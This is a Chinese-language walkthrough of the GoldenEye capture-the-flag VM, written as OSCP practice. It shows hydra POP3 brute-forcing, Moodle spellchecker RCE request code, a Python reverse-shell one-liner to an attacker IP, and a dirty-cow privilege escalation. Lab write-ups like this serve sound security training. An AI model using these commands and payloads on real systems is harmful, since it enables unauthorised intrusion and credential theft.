# 前言 備考OSCP，所以接下來會做一系列的OSCP向靶機來練手 ## 靶機描述 I recently got done creating an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt. I'd rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there's a hint of CTF flavor. I've created and validated on VMware and VirtualBox. You won't need any extra tools other than what's on Kali by default. Will need to be setup as Host-Only, and on VMware you may need to click "retry" if prompted, upon initially starting it up because of formatting. Beta - 2018-05-02 v1 - 2018-05-04 ## 資訊蒐集 nmap -sP 192.168.218.0/24 發現靶機IP 192.168.218.131 nmap -sV -A 192.168.218.131 ``` Nmap scan report for 192.168.218.131 Host is up (0.00017s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 25/tcp open smtp Postfix smtpd |_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=ubuntu | Not valid before: 2018-04-24T03:22:34 |_Not valid after: 2028-04-21T03:22:34 |_ssl-date: TLS randomness does not represent time 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: GoldenEye Primary Admin Server MAC Address: 00:0C:29:06:CF:07 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.17 ms 192.168.218.131 ``` 訪問80埠  得到提示，使用賬號GOLDENEYE,top弱密碼爆破/sev-home/實現登陸。 抓包看了一下 ``` GET /sev-home/sev-home/ HTTP/1.1 Host: 192.168.218.131 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.218.131/ Upgrade-Insecure-Requests: 1 Authorization: Basic U2V2ZXJuYXlhOkdvbGRlbkV5ZQ== ``` Authorization: Basic base64(賬號:密碼) 寫個指令碼生成字典，intruder爆破無果。 ```python import base64 url = 'http://192.168.218.131/sev-home/' dic = 'F:/創新實踐/dictionary/Web-Fuzzing-Box-main/Brute/Password/Top_Dev_Password.txt' name = 'GOLDENEYE' with open(dic, 'r') as f1: with open('goldeneye.txt', 'a') as f2: for line in f1: passwd = line.strip() plaintext = name + ':'+ passwd ciphertext = base64.b64encode(plaintext.encode()) auth = 'Basic ' + ciphertext.decode() f2.write(auth) f2.write('\n') ``` 重新回到頁面，檢視原始碼。有一個terminal.js.註釋部分如下 ```js // //Boris, make sure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic.... // //I encoded you p@ssword below... // //InvincibleHack3r // //BTW Natalya says she can break your codes // ``` html實體編碼的密碼，給它解一下，為InvincibleHack3r  嘗試用Boris和密碼登陸，賬號為boris時成功。 登入後又是一段文字 ``` # GoldenEye GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO) Please email a qualified GNO supervisor to receive the online **GoldenEye Operators Training** to become an Administrator of the GoldenEye system Remember, since ***security by obscurity\*** is very effective, we have configured our pop3 service to run on a very high non-default port ``` 在原始碼中發現註釋Natalya和Boris，還是之前那倆  從文字看我們下一步要向主管發郵件，pop3埠在高階口處。 再用nmap掃一波全埠 nmap -sV -p- 192.168.218.131 ``` Nmap scan report for 192.168.218.131 Host is up (0.00050s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 25/tcp open smtp Postfix smtpd 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 55006/tcp open ssl/pop3 Dovecot pop3d 55007/tcp open pop3 Dovecot pop3d MAC Address: 00:0C:29:06:CF:07 (VMware) ``` 問題來了，smtp和pop3這倆郵件協議要有什麼攻擊姿勢呢？ 搜了一下，一是smtp 偽造郵件，二是pop3爆破。偽造郵件的主要問題在於這主管的郵箱地址是啥，supervisor@GoldenEye ？往哪兒發呢。先爆破pop3吧。 有msf的pop3_login模組爆破了一波boris，感覺太慢了。換成hydra吧 （先查了下kali的字典放在哪兒） ```shell hydra -s 55007 -l boris -P /usr/share/wordlists/fasttrack.txt -e nsr 192.168.218.131 pop3 hydra -s 55007 -l natalya -P /usr/share/wordlists/fasttrack.txt -e nsr 192.168.218.131 pop3 ``` 得到結果：  boris secret1! natalya bird 那麼現在嘗試登陸pop3，常用命令如下 | 命令 | 引數 | 使用在何種狀態中 | 描述 | | ---- | ---------------------- | ---------------- | ------------------------------------------------------------ | | USER | Username | 認證 | 此命令與下面的pass命令若成功，將導致狀態轉換 | | PASS | Password | 認證 | 此命令若成功，狀態轉化為更新 | | APOP | Name,Digest | 認證 | Digest是MD5訊息摘要 | | STAT | None | 處理 | 請求伺服器發回關於郵箱的統計資料，如郵件總數和總位元組數 | | UIDL | [Msg#]（郵件號，下同） | 處理 | 返回郵件的唯一識別符號，POP3會話的每個識別符號都將是唯一的 | | LIST | [Msg#] | 處理 | 返回郵件的唯一識別符號，POP3會話的每個識別符號都將是唯一的 | | RETR | [Msg#] | 處理 | 返回由引數標識的郵件的全部文字 | | DELE | [Msg#] | 處理 | 伺服器將由引數標識的郵件標記為刪除，由QUIT命令執行 | | TOP | [Msg#] | 處理 | 伺服器將返回由引數標識的郵件的郵件頭+前n行內容，n必須是正整數 | | NOOP | None | 處理 | 伺服器返回一個肯定的響應，用於測試連線是否成功 | | QUIT | None | 處理、認證 | ***\*1)\**** 如果伺服器處於“處理”狀態，麼將進入“更新”狀態以刪除任何標記為刪除的郵件，並重返“認證”狀態。***\*2)\**** 如果伺服器處於“認證”狀態，則結束會話，退出連線 | boris下有3篇郵件 *LIST* *+OK 3 messages:* *1 544* *2 373* *3 921* *.* *RETR 1* *+OK 544 octets* *Return-Path: * *X-Original-To: boris* *Delivered-To: boris@ubuntu* *Received: from ok (localhost [127.0.0.1])* *by ubuntu (Postfix) with SMTP id D9E47454B1* *for ; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)* *Message-Id: <20180425022326.D9E47454B1@ubuntu>* *Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)* *From: [email protected]* *Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.* *.* *RETR 2* *+OK 373 octets* *Return-Path: * *X-Original-To: boris* *Delivered-To: boris@ubuntu* *Received: from ok (localhost [127.0.0.1])* *by ubuntu (Postfix) with ESMTP id C3F2B454B1* *for ; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)* *Message-Id: <20180425024249.C3F2B454B1@ubuntu>* *Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)* *From: natalya@ubuntu* *Boris, I can break your codes!* *.* *RETR 3* *+OK 921 octets* *Return-Path: * *X-Original-To: boris* *Delivered-To: boris@ubuntu* *Received: from janus (localhost [127.0.0.1])* *by ubuntu (Postfix) with ESMTP id 4B9F4454B1* *for ; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)* *Message-Id: <20180425025235.4B9F4454B1@ubuntu>* *Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)* *From: [email protected]* *Boris,* *Your cooperation with our syndicate will pay off big. ==Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email==. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!* *Once ==Xenia== gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....* *PS - Keep security tight or we will be compromised.* ---------- 換一個使用者Natalya(登陸的時候要大寫，也不知道為啥hydra小寫也行)有兩封郵件 *LIST* *+OK 2 messages:* *1 631* *2 1048* *.* *RETR 1 +OK 631 octets* *Return-Path: * *X-Original-To: natalya* *Delivered-To: natalya@ubuntu* *Received: from ok (localhost [127.0.0.1])* *by ubuntu (Postfix) with ESMTP id D5EDA454B1* *for ; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)* *Message-Id: <20180425024542.D5EDA454B1@ubuntu>* *Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)* *From: root@ubuntu* *Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.* *Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.* *.* *RETR 2* *+OK 1048 octets* *Return-Path: * *X-Original-To: natalya* *Delivered-To: natalya@ubuntu* *Received: from root (localhost [127.0.0.1])* *by ubuntu (Postfix) with SMTP id 17C96454B1* *for ; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)* *Message-Id: <20180425031956.17C96454B1@ubuntu>* *Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)* *From: root@ubuntu* *Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)* *Ok, user creds are:* *==username: xenia==* *==password: RCP90rulez!==* *Boris verified her as a valid contractor so just create the account ok?* *And if you didn't have the URL on outr ==internal Domain: severnaya-station.com/gnocertdir==* ***Make sure to edit your host file since you usually work remote off-network....* *Since you're a Linux user just ==point this servers IP to severnaya-station.com in /etc/hosts==.* 根據現在獲得的線索，有一個新系統。host繫結靶機IP到severnaya-station.com 訪問http://severnaya-station.com/gnocertdir  登陸後，wappalyzer識別為Moodle。點選site blogs標籤發現版本2.2.3. 點選message發現與Dr Doak的訊息，其中提到郵件賬號doak，也爆破一下。等待的時候順便搜一下Moodle都有啥公開漏洞。  登陸郵箱檢視  成功得到賬號，在加上剛才的搜尋，懷疑是教師角色的RCE那個洞（CVE-2018-1133，但版本又對不上。 先登陸翻一翻再說——在 my private files 中得到s3cret.txt ``` 007, I was able to capture this apps adm1n cr3ds through clear txt. Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. Something juicy is located here: /dir007key/for-007.jpg Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play. ``` 圖片如下，放大可以看到英文大意是藏了acess key  分析一下  base64這段解出來是xWinter1995x!，嘗試登陸admin賬號成功。 ##打點-getshell 想辦法getshell.繼續看exploit-db,發現有一個2013年的RCE，還是msf上有的[exp](https://www.exploit-db.com/exploits/29324)。但OSCP不是隻能在一臺靶機上使用msf嘛，大致掃了一遍exp也就3個步驟，為了練習起見我們先手動跟一下exp流程（其實是msf沒打通）。 1.更改spell engine  把Spell engine改成上圖，第二個不用改 2.插入payload ```ruby post = { 'section' => 'systempaths', 'sesskey' => sesskey, 'return' => '', 's__gdversion' => '2', 's__pathtodu' => '/usr/bin/du', 's__aspellpath' => payload.encoded, 's__pathtodot' => '' } aspell = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/admin/settings.php'), 'vars_post' => post, 'cookie' => sess }) spellcheck = '{"id":"c0","method":"checkWords","params":["en",[""]]}' print_status("Triggering payload") ``` 我們先找到這個頁面/admin/settings.php?section=systempaths  這裡填的程式碼也不知道是給點提示還是我之前msf沒打通留下的。 填入python彈shell的程式碼 ```python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.218.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` 3.真觸發漏洞 ```ruby spellcheck = '{"id":"c0","method":"checkWords","params":["en",[""]]}' print_status("Triggering payload") resp = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php'), 'data' => spellcheck, 'ctype' => 'application/json', 'cookie' => sess }) if !resp or resp.code != 200 fail_with("Error triggering payload") ``` 訪問http://severnaya-station.com/gnocertdir/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php 通過hackbar傳送exp的觸發內容  成功接到反彈shell  ## 後滲透-提權 照例先找suid提權 ```shell find / -perm -u=s -type f 2>/dev/null ```  本地python起一個http，靶機用wget下載Linux Exploit Suggester 2，給執行許可權並執行  上傳髒牛 因為沒有gcc 用cc 編譯執行 ```shell cc cowroot.c -o cowroot -pthread ./cowroot ```  然後執行ls /root卡住了。。訪問網站發現打不開。giao，直接打掛了。 幾經波折最終用https://www.exploit-db.com/exploits/37292拿到root 568628e0d993b1973adc718237da6e93   # 總結 這次的主要收穫是對郵件協議pop3的攻擊，getshell過程很普通，但是沒有用msf——exp步驟清晰確實也不需要。拿到shell之後，提權的過程確實比預料的要廢了很多波折。